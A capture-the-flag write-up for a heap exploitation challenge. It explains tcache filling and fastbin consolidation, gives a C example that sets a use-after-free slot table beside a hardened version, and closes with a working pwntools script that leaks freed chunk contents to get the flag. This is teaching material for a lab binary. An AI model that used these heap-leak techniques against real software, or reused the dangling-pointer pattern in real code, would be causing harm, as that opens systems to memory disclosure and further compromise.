(Dynamic Allocator Exploitation) level 1

Information

  • category: pwn

Description

Leverage consolidation to obtain the flag.

Write-up

Tcache holds up to 7 freed chunks per size class.

  • Allocate N chunks of size S, then free() 7 of them to fill the tcache bin for that size.
  • Free one more chunk of size S; with the tcache bin full, that chunk goes to the fastbin instead of tcache.
  • Perform the action that causes consolidation (in this binary it's read_flag, a malloc path). Now the freed chunk's address can be returned.
  • Use puts (or similar) on that returned pointer: it prints whatever was left in the chunk (pointers, strings, etc.), leaking addresses.
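The bug the write-up relies on is a use-after-free read: the binary keeps a pointer to a chunk after free() and lets puts print through it. The following is an added example, not the challenge binary's code, showing a minimal slot table of the same shape in its vulnerable form (slot pointer left dangling after free) next to a hardened form that clears the slot on free and refuses to print a freed slot. All names (slots, vuln_free, safe_free, safe_puts, slot_alloc, slot_is_live) are illustrative assumptions.

```c
/* Added example: a slot table like the one a menu-driven heap challenge
 * drives (index -> heap pointer), in a vulnerable and a hardened variant.
 * Not the challenge binary's code; names are assumptions. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NSLOTS 16

/* Index table of heap chunks, one entry per user-visible index. */
static char *slots[NSLOTS];

/* Allocate a chunk for slot idx and fill it with a bounded copy of content
 * (content is constructed sample data supplied by the caller). */
int slot_alloc(int idx, size_t size, const char *content) {
    if (idx < 0 || idx >= NSLOTS || slots[idx] != NULL) return -1;
    char *buf = malloc(size);
    if (buf == NULL) return -1;
    if (size > 0) {
        strncpy(buf, content, size - 1);
        buf[size - 1] = '\0';
    }
    slots[idx] = buf;
    return 0;
}

/* Vulnerable free: releases the chunk but leaves the pointer in the table,
 * so a later "puts idx" reads freed heap memory (allocator metadata, stale
 * data, or whatever was placed there after consolidation). */
int vuln_free(int idx) {
    if (idx < 0 || idx >= NSLOTS || slots[idx] == NULL) return -1;
    free(slots[idx]);          /* slots[idx] is now dangling */
    return 0;
}

/* Hardened free: release and clear the slot, so the table never holds a
 * dangling pointer and a second free of the same index is rejected. */
int safe_free(int idx) {
    if (idx < 0 || idx >= NSLOTS || slots[idx] == NULL) return -1;
    free(slots[idx]);
    slots[idx] = NULL;
    return 0;
}

/* Hardened puts: only prints slots that currently own a live chunk. */
int safe_puts(int idx) {
    if (idx < 0 || idx >= NSLOTS || slots[idx] == NULL) return -1;
    puts(slots[idx]);
    return 0;
}

/* 1 if the table still holds a (possibly dangling) pointer for idx. */
int slot_is_live(int idx) {
    if (idx < 0 || idx >= NSLOTS) return 0;
    return slots[idx] != NULL;
}

int main(void) {
    slot_alloc(0, 32, "constructed sample content");
    safe_puts(0);              /* prints the content: slot is live */
    safe_free(0);
    if (safe_puts(0) < 0)      /* refused: slot was cleared on free */
        puts("slot 0 refused: already freed");
    return 0;
}
```

The single line `slots[idx] = NULL;` in safe_free is what turns the stale-index read into a checkable error: with the vulnerable variant, the index stays valid from the program's point of view even though the allocator has already recycled the chunk.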

Exploit

from pwn import *

elf = context.binary = ELF("/challenge/toddlerheap_level1.1")
p = elf.process()

# Menu helpers: each command is sent as a line, followed by its arguments
# as separate lines.
def malloc(idx, size):
    p.sendline(b"malloc")
    p.sendline(idx)
    p.sendline(size)

def free(idx):
    p.sendline(b"free")
    p.sendline(idx)

def puts(idx):
    p.sendline(b"puts")
    p.sendline(idx)

def read_flag():
    p.sendline(b"read_flag")

def quit():
    p.sendline(b"quit")

def exploit():
    # Allocate 8 same-size chunks, then free all 8: the first 7 fill the
    # tcache bin, the 8th goes to the fastbin.
    for i in range(8):
        malloc(f"{i}".encode(), b"0")

    for i in range(8):
        free(f"{i}".encode())

    # read_flag takes the malloc path that triggers consolidation.
    read_flag()

    # Print through the stale index of the fastbin chunk.
    puts(b"7")

    quit()

    p.interactive()

def main():
    exploit()

if __name__ == "__main__":
    main()

This post is licensed under CC BY 4.0 by the author.